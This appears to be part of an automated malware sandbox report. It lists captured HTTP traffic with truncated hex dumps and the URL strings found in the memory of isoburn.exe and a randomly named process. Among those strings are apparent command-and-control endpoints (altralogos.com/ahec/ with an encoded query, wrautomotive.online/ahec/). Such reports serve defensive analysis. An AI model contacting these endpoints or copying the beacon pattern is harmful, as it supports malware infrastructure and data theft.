64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:50 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:52 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:55 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 6
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006C3C000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000447C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://altralogos.com/ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005AF6000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003336000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1595035240.000000000A126000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: qNENczArVjafOgvC.exe, 0000000D.00000002.3732252302.0000000002CCD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrautomotive.online
            Source: qNENczArVjafOgvC.exe, 0000000D.00000002.3732252302.0000000002CCD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrautomotive.online/ahec/
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006462000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003CA2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js
